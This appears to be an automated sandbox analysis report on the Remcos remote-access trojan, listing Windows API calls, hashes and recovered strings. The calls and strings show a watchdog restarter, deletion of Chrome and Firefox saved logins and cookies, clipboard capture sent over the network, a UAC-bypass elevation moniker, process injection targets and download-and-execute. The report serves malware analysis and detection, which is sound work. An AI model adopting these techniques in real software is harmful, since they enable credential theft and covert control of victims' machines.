                                • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                • API String ID: 3018269243-13974260
                                • Opcode ID: cf8836db070dde1e79f7b372f7e703d1748ead536f5279adb044898871b6b780
                                • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                • Opcode Fuzzy Hash: cf8836db070dde1e79f7b372f7e703d1748ead536f5279adb044898871b6b780
                                • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                • FindClose.KERNEL32(00000000), ref: 0040BD12
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                • API String ID: 1164774033-3681987949
                                • Opcode ID: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                                • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                • Opcode Fuzzy Hash: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                                • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                APIs
                                • OpenClipboard.USER32 ref: 004168C2
                                • EmptyClipboard.USER32 ref: 004168D0
                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                • GlobalLock.KERNEL32 ref: 004168F9
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                • SetClipboardData.USER32 ref: 00416938
                                • CloseClipboard.USER32 ref: 00416955
                                • OpenClipboard.USER32 ref: 0041695C
                                • GetClipboardData.USER32 ref: 0041696C
                                • GlobalLock.KERNEL32 ref: 00416975
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                • CloseClipboard.USER32 ref: 00416984
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                • String ID: !D@
                                • API String ID: 3520204547-604454484
                                • Opcode ID: 6c018320e5b0d2cabe6153e6df3be29feb4b7020e0ff09a9ecc452abf36931f7
                                • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                • Opcode Fuzzy Hash: 6c018320e5b0d2cabe6153e6df3be29feb4b7020e0ff09a9ecc452abf36931f7
                                • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                • FindClose.KERNEL32(00000000), ref: 0040BED0
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Close$File$FirstNext
                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 3527384056-432212279
                                • Opcode ID: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                                • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                • Opcode Fuzzy Hash: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                                • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                • CloseHandle.KERNEL32(00000000), ref: 0040F563
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • CloseHandle.KERNEL32(00000000), ref: 0040F66E
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                • API String ID: 3756808967-1743721670
                                • Opcode ID: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                                • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                • Opcode Fuzzy Hash: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                                • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0$1$2$3$4$5$6$7$VG
                                • API String ID: 0-1861860590
                                • Opcode ID: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                                • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                • Opcode Fuzzy Hash: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                                • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                APIs
                                • _wcslen.LIBCMT ref: 00407521
                                • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Object_wcslen
                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                • API String ID: 240030777-3166923314
                                • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                • GetLastError.KERNEL32 ref: 0041A7BB
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                • String ID:
                                • API String ID: 3587775597-0
                                • Opcode ID: 79deda2eaf5389e9881e5cc6274fd0cbf241d84606103934df9ee54e93fb00d6
                                • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                • Opcode Fuzzy Hash: 79deda2eaf5389e9881e5cc6274fd0cbf241d84606103934df9ee54e93fb00d6
                                • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                • String ID: lJD$lJD$lJD
                                • API String ID: 745075371-479184356
                                • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                • FindClose.KERNEL32(00000000), ref: 0040C47D
                                • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 1164774033-405221262
                                • Opcode ID: 285c5e5c0a0229c45b09239667504c56f02977e4a07d16255c72b533a04b213f
                                • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                • Opcode Fuzzy Hash: 285c5e5c0a0229c45b09239667504c56f02977e4a07d16255c72b533a04b213f
                                • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                • String ID:
                                • API String ID: 2341273852-0
                                • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Find$CreateFirstNext
                                • String ID: 8SG$PXG$PXG$NG$PG
                                • API String ID: 341183262-3812160132
                                • Opcode ID: cb7bcd549964d34beac6a9ed48e4264662a834438446d80613bd2f371497bcfa
                                • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                • Opcode Fuzzy Hash: cb7bcd549964d34beac6a9ed48e4264662a834438446d80613bd2f371497bcfa
                                • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                • String ID:
                                • API String ID: 1888522110-0
                                • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                APIs
                                • RegCreateKeyExW.ADVAPI32(00000000), ref: 0041409D
                                • RegCloseKey.ADVAPI32(?), ref: 004140A9
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 0041426A
                                • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                • API String ID: 2127411465-314212984
                                • Opcode ID: 31f50e56d7f4f7f2575dbc53f49883a4967628fc93eddf4b35ee6b86778a76ed
                                • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                • Opcode Fuzzy Hash: 31f50e56d7f4f7f2575dbc53f49883a4967628fc93eddf4b35ee6b86778a76ed
                                • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                APIs
                                • _free.LIBCMT ref: 00449212
                                • _free.LIBCMT ref: 00449236
                                • _free.LIBCMT ref: 004493BD
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                • _free.LIBCMT ref: 00449589
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                • String ID:
                                • API String ID: 314583886-0
                                • Opcode ID: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                • Opcode Fuzzy Hash: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                APIs
                                  • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                  • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                  • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                  • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                  • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 0041686B
                                • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                • API String ID: 1589313981-2876530381
                                • Opcode ID: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                                • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                • Opcode Fuzzy Hash: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                                • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                APIs
                                • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: ACP$OCP$['E
                                • API String ID: 2299586839-2532616801
                                • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                • GetLastError.KERNEL32 ref: 0040BA58
                                Strings
                                • UserProfile, xrefs: 0040BA1E
                                • [Chrome StoredLogins not found], xrefs: 0040BA72
                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                APIs
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                • GetLastError.KERNEL32 ref: 0041799D
                                Strings
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                • String ID: SeShutdownPrivilege
                                APIs
                                • __EH_prolog.LIBCMT ref: 00409258
                                  • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                • FindClose.KERNEL32(00000000), ref: 004093C1
                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                  • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                • FindClose.KERNEL32(00000000), ref: 004095B9
                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                Yara matches
                                Similarity
                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                • String ID:
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ManagerStart
                                • String ID:
                                APIs
                                • FindResourceA.KERNEL32 ref: 0041B4B9
                                • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID: SETTINGS
                                APIs
                                • __EH_prolog.LIBCMT ref: 0040966A
                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstH_prologNext
                                • String ID:
                                APIs
                                • __EH_prolog.LIBCMT ref: 00408811
                                • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                • String ID:
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                Strings
                                Yara matches
                                Similarity
                                • API ID: DownloadExecuteFileShell
                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Yara matches
                                Similarity
                                • API ID: FileFind$FirstNextsend
                                • String ID: XPG$XPG
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                Strings
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                • String ID: sJD
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
